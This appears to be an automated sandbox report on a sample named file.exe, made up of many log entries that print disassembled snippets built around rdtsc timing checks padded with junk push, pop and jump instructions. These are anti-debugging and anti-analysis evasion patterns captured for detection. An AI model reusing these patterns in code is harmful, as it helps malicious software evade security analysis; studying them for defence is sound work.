                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580016 second address: 580026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007F5B4D24B716h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580026 second address: 58002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58002A second address: 580060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5B4D24B716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5B4D24B728h 0x00000014 jmp 00007F5B4D24B71Fh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5804E8 second address: 580522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5B4C774D96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5B4C774D98h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580522 second address: 58053A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5B4D24B722h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58053A second address: 580554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D92h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 57EC29 second address: 57EC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FA45D second address: 4FA461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58F7F1 second address: 58F82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F5B4D24B716h 0x0000000c popad 0x0000000d push esi 0x0000000e jmp 00007F5B4D24B724h 0x00000013 jmp 00007F5B4D24B71Eh 0x00000018 pop esi 0x00000019 jp 00007F5B4D24B71Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58E47D second address: 58E499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F5B4C774D97h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58E499 second address: 58E4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jno 00007F5B4D24B716h 0x0000000b popad 0x0000000c push eax 0x0000000d jo 00007F5B4D24B716h 0x00000013 pop eax 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F5B4D24B71Ch 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 pop eax 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58E4C9 second address: 58E4D3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5B4C774D86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58E4D3 second address: 58E4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58E4D9 second address: 58E4E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58E4E0 second address: 58E4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5B4D24B716h 0x0000000a jmp 00007F5B4D24B71Ah 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007F5B4D24B716h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58E69E second address: 58E6B0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F5B4C774D86h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58E859 second address: 58E869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5B4D24B71Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 58E179 second address: 58E185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FDBFD second address: 4FDC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 594E1D second address: 594E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5B4C774D86h 0x0000000a popad 0x0000000b jbe 00007F5B4C774D92h 0x00000011 pop ecx 0x00000012 ja 00007F5B4C774DA1h 0x00000018 pushad 0x00000019 jc 00007F5B4C774D86h 0x0000001f jmp 00007F5B4C774D8Dh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 594701 second address: 594709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 594709 second address: 594716 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 594716 second address: 59471C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5948BA second address: 5948BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59895A second address: 598960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59F372 second address: 59F378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59F378 second address: 59F38F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5B4D24B722h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59DD3D second address: 59DD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59DD4B second address: 59DD57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5B4D24B716h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59DE6E second address: 59DE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 552090 second address: 552096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 55214C second address: 55215E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jg 00007F5B4C774D86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59E558 second address: 59E55E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59E55E second address: 59E564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59E564 second address: 59E581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4D24B729h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59E581 second address: 59E595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Bh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59E6EE second address: 59E6FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F5B4D24B716h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59E6FC second address: 59E71B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5B4C774D92h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59E71B second address: 59E726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5B4D24B716h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59E726 second address: 59E72B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59F0AB second address: 59F0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A2D11 second address: 5A2D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A8AFA second address: 5A8B1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 jnp 00007F5B4D24B716h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 jp 00007F5B4D24B71Ch 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A8B1B second address: 5A8B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5B4C774D97h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A8DFA second address: 5A8E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A8E03 second address: 5A8E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A9698 second address: 5A969C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A969C second address: 5A96AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jl 00007F5B4C774D86h 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A96AA second address: 5A96B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A96B1 second address: 5A96B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A99DA second address: 5A99FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B726h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A99FA second address: 5A9A14 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F5B4C774D86h 0x00000014 je 00007F5B4C774D86h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A9A14 second address: 5A9A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A9A18 second address: 5A9A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5B4C774D8Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A9CD7 second address: 5A9CDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5A9FFF second address: 5AA01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4C774D99h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AA01E second address: 5AA03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5B4D24B727h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AA58C second address: 5AA590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AA590 second address: 5AA5A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F5B4D24B716h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AA5A1 second address: 5AA5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AA5A7 second address: 5AA5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5AA5AC second address: 5AA5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F5B4C774D86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B0110 second address: 5B0114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B0114 second address: 5B011A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B011A second address: 5B014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5B4D24B727h 0x0000000b push ebx 0x0000000c jmp 00007F5B4D24B722h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B320F second address: 5B3217 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B3217 second address: 5B3228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4D24B71Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B3228 second address: 5B322C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B34EB second address: 5B34F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B34F1 second address: 5B34F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B34F6 second address: 5B350F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F5B4D24B71Bh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop ecx 0x0000000b jo 00007F5B4D24B71Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B37D2 second address: 5B37DC instructions: 0x00000000 rdtsc 0x00000002 je 00007F5B4C774D86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5B3C19 second address: 5B3C4F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5B4D24B716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5B4D24B722h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F5B4D24B71Fh 0x00000017 jnl 00007F5B4D24B716h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 507CDD second address: 507CE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BA8D1 second address: 5BA8D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BAA7D second address: 5BAA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BAA81 second address: 5BAA97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B71Ch 0x00000007 je 00007F5B4D24B716h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BAA97 second address: 5BAAC8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5B4C774D9Eh 0x00000008 pushad 0x00000009 jno 00007F5B4C774D86h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jne 00007F5B4C774D86h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BAF0A second address: 5BAF29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F5B4D24B71Bh 0x0000000c pop edx 0x0000000d jl 00007F5B4D24B718h 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BAF29 second address: 5BAF2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BAF2D second address: 5BAF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BAF33 second address: 5BAF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BAF45 second address: 5BAF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BB336 second address: 5BB365 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5B4C774D86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5B4C774D94h 0x00000011 pop edi 0x00000012 push eax 0x00000013 pushad 0x00000014 jne 00007F5B4C774D86h 0x0000001a push esi 0x0000001b pop esi 0x0000001c push esi 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BB617 second address: 5BB620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BB620 second address: 5BB638 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BB638 second address: 5BB640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BB640 second address: 5BB644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BB644 second address: 5BB64A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BB7B0 second address: 5BB7B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BBF22 second address: 5BBF32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BBF32 second address: 5BBF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BC6A2 second address: 5BC6AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BC6AC second address: 5BC6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BC6B0 second address: 5BC6BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BC6BF second address: 5BC6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BC6C3 second address: 5BC6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5BC6C7 second address: 5BC6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5B4C774D8Bh 0x0000000b rdtsc
